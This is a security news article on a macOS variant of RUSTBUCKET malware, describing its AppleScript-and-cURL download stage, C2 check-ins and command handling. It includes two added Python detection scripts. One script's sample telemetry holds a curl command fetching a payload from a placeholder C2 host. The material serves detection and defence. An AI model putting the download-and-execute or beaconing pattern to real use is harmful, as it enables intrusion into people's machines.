Cyber Security News

New RUSTBUCKET Malware With Zero Detections on VirusTotal

The DPRK campaign is utilizing a recently updated version of Rustbucket malware to avoid being detected.

This variant of RUSTBUCKET targets macOS systems, adds persistence capabilities not previously observed and, at the time of reporting, is undetected by VirusTotal signature engines.

The Elastic Security Labs team has detected a new variant of the RUSTBUCKET malware, a family that has been previously attributed to the BlueNorOff group by Jamf Threat Labs in April 2023. 

The DPRK conducts malicious cyber activities and deploys information technology (IT) workers who fraudulently obtain employment to generate revenue.

RUSTBUCKET Malware Infection Chain

According to the research, the RUSTBUCKET family of malware is under active development. Additionally, at the time of publication, this new variant has zero detections on VirusTotal and leverages a dynamic network infrastructure methodology for command and control.

The command /usr/bin/osascript is used to execute the AppleScript, which is responsible for downloading the Stage 2 binary from the C2 using cURL.

This session includes the string pd in the body of the HTTP request and cur1-agent as the User-Agent string, and it saves the Stage 2 binary to /users/shared/.pd.

The Stage 2 binary (.pd) is compiled in Swift and operates based on command-line arguments. The binary expects a C2 URL to be provided as the first parameter when executed. 

Upon execution, it invokes the downAndExec function, which is responsible for preparing a POST HTTP request. 

To initiate this request, the binary sets the User-Agent string as mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0) and includes the string pw in the body of the HTTP request.

During execution, the malware utilizes specific macOS APIs for various operations. It begins with NSFileManager’s temporaryDirectory function to obtain the current temporary folder, then generates a random UUID using NSUUID’s UUID.init method. 

Finally, the malware combines the temporary directory path with the generated UUID to create a unique file location and writes the payload to it.

Once the payload is written to disk, the malware utilizes NSTask to initiate its execution.
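The Stage 1 and Stage 2 behaviours described above (osascript spawning cURL with the cur1-agent User-Agent, the drop to /users/shared/.pd, and Stage 2 launching a UUID-named file from the temporary directory) translate into endpoint detection rules. The following is an added example, not code from the article or from Elastic Security Labs; the key=value event format, hostnames and paths in the sample telemetry are constructed for the demonstration and will differ from a real EDR export.

```python
"""Added example: rules over constructed macOS endpoint telemetry that flag the
RUSTBUCKET stage-1/stage-2 behaviours described in the article."""
import re

# Constructed sample events (assumption: a simple key=value export; adapt
# parse_event() to your EDR's schema). The C2 hostname is a placeholder.
SAMPLE_EVENTS = """\
type=process parent=osascript name=curl args="-A cur1-agent -d pd -o /Users/Shared/.pd http://c2.example.invalid/"
type=file action=write path=/Users/Shared/.pd proc=curl
type=process parent=.pd name=/var/folders/zz/abc/T/3F2504E0-4F89-11D3-9A0C-0305E82C3301 args=""
type=process parent=Terminal name=curl args="-sS https://example.org/index.html"
type=process parent=launchd name=/var/folders/zz/abc/T/com.apple.foo.XXXX args=""
"""

EVENT_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
# NSUUID.UUID() produces 8-4-4-4-12 hex groups; that is the file name shape
# stage 2 writes into NSFileManager.temporaryDirectory.
UUID_NAME = re.compile(r"^[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}$", re.I)
TEMP_DIRS = ("/var/folders/", "/private/var/folders/", "/tmp/", "/private/tmp/")


def parse_event(line):
    """Turn one key=value line into a dict, stripping quotes from values."""
    return {k: v.strip('"') for k, v in EVENT_KV.findall(line)}


def rules_for(ev):
    """Return the names of every rule the event matches (possibly none)."""
    hits = []
    if ev.get("type") == "process":
        name = ev.get("name", "")
        parent = ev.get("parent", "")
        args = ev.get("args", "")
        # Stage 1: AppleScript (osascript) driving cURL with the malware's
        # distinctive User-Agent string.
        if parent.endswith("osascript") and name.endswith("curl") \
                and "cur1-agent" in args.lower():
            hits.append("stage1_osascript_curl_cur1agent")
        # Stage 2: execution of a UUID-named file straight out of the temp dir.
        if name.startswith(TEMP_DIRS) and UUID_NAME.match(name.rsplit("/", 1)[-1]):
            hits.append("stage2_uuid_temp_exec")
    # The drop location; compared case-insensitively because the default
    # macOS file system is case-insensitive.
    if ev.get("type") == "file" and ev.get("action") == "write" \
            and ev.get("path", "").lower() == "/users/shared/.pd":
        hits.append("stage2_dropped_pd")
    return hits


def scan(text):
    """Scan newline-separated events; return (line_number, rule_name) pairs."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        for rule in rules_for(parse_event(line)):
            findings.append((number, rule))
    return findings


if __name__ == "__main__":
    for number, rule in scan(SAMPLE_EVENTS):
        print(f"line {number}: {rule}")
```

The UUID-in-temp rule is the least specific of the three and will need tuning against legitimate installers that also stage payloads under /var/folders; the parent-process condition (here .pd) is the natural field to add once you know what your telemetry records.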

Gathers System Information

The malware initiates its operations by dynamically generating a 16-byte random value at runtime. This value serves as a distinctive identifier for the specific instance of the active malware. Subsequently, the malware proceeds to gather comprehensive system information, including:

  • Computer name
  • List of active processes
  • Current timestamp
  • Installation timestamp
  • System boot time
  • Status of all running processes within the system

The malware establishes its initial connection to the C2 server by transmitting the gathered data via a POST request. The request is accompanied by a User-Agent string formatted as Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0).

Upon receiving the request, the C2 server responds with a command ID, which serves as an instruction for the malware. The malware is designed to handle only two commands.

  • Command ID 0x31: self-terminate.
  • Command ID 0x30: enables the operator to upload malicious Mach-O binaries or shell scripts to the system and execute them.

The malware proceeds by granting execution permissions to the uploaded file using the chmod API. After executing the payload, the malware sends a status update to the server, notifying it of the completed execution, and then sleeps for 60 seconds.

Following this delay, the malware loops to collect system information once again and remains in a waiting state, anticipating the arrival of the next command from the server.
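The check-in loop described above (a POST to the C2 carrying the MSIE 8.0 User-Agent, then a 60-second sleep, repeated) leaves a regular pattern in web-proxy logs. The following is an added example, not code from the article or from Elastic Security Labs; the log format, client addresses and hostnames are constructed for the demonstration. It flags a source/host pair when either the User-Agent matches the one reported for RUSTBUCKET or the POST cadence is close to the stated 60-second period, so it also surfaces periodic POST beaconing that uses some other User-Agent.

```python
"""Added example: detect the RUSTBUCKET stage-2 check-in cadence in constructed
web-proxy log lines (not from the article)."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# The User-Agent the article reports for the C2 POST; compared lower-cased
# because the sample is reported with both capitalisations.
RUSTBUCKET_UA = "mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)"

# Constructed sample log: "<ts> <src> <method> <url> "<user-agent>" <status>".
# 10.0.0.5 shows the 60-second beacon; 10.0.0.7 is ordinary browsing.
SAMPLE_PROXY_LOG = """\
2023-07-01T10:00:00Z 10.0.0.5 POST http://c2.example.invalid/ "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 200
2023-07-01T10:00:10Z 10.0.0.7 POST http://api.example.org/v1 "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) Safari/605.1.15" 200
2023-07-01T10:00:12Z 10.0.0.7 POST http://api.example.org/v1 "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) Safari/605.1.15" 200
2023-07-01T10:00:30Z 10.0.0.7 GET http://www.example.org/news "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) Safari/605.1.15" 200
2023-07-01T10:01:01Z 10.0.0.5 POST http://c2.example.invalid/ "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 200
2023-07-01T10:02:00Z 10.0.0.5 POST http://c2.example.invalid/ "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 200
2023-07-01T10:03:02Z 10.0.0.5 POST http://c2.example.invalid/ "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 200
2023-07-01T10:05:40Z 10.0.0.7 POST http://api.example.org/v1 "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) Safari/605.1.15" 200
"""

LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)" (\d{3})$')


def parse_line(line):
    """Parse one proxy log line; return None for lines that do not match."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ts, src, method, url, ua, _status = m.groups()
    host = url.split("/", 3)[2]  # "scheme://host/path" -> host
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "src": src, "method": method, "host": host, "ua": ua}


def find_beacons(text, period=60, tolerance=5, min_hits=3):
    """Group POSTs by (src, host, user-agent) and flag matching UA or cadence."""
    groups = defaultdict(list)
    for line in text.splitlines():
        ev = parse_line(line)
        if ev and ev["method"] == "POST":
            groups[(ev["src"], ev["host"], ev["ua"].lower())].append(ev["ts"])

    findings = []
    for (src, host, ua), times in groups.items():
        times.sort()
        ua_match = ua == RUSTBUCKET_UA
        med, periodic = None, False
        if len(times) >= min_hits:
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            med = median(gaps)
            # A 60-second sleep plus request time gives gaps clustered just
            # above 60 s; require the median near the period and low jitter.
            periodic = abs(med - period) <= tolerance and \
                all(abs(g - med) <= tolerance for g in gaps)
        if ua_match or periodic:
            findings.append({"src": src, "host": host, "count": len(times),
                             "median_gap": med, "ua_match": ua_match,
                             "periodic": periodic})
    return sorted(findings, key=lambda f: (f["src"], f["host"]))


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_PROXY_LOG):
        print(f)
```

The cadence check on its own will also catch legitimate software that polls every minute, so treat a periodic hit without the User-Agent match as a lead to triage rather than an alert; the User-Agent string is the higher-fidelity signal, and the pair together is what you would want in a rule.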

The multi-stage composition of the malware, in addition to the use of Rust programming language and the targeting of macOS, make detection and prevention a significant challenge. 

Indicator of compromise:




Sujatha is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under her belt in Cyber Security, she is covering Cyber Security News, technology and other news.
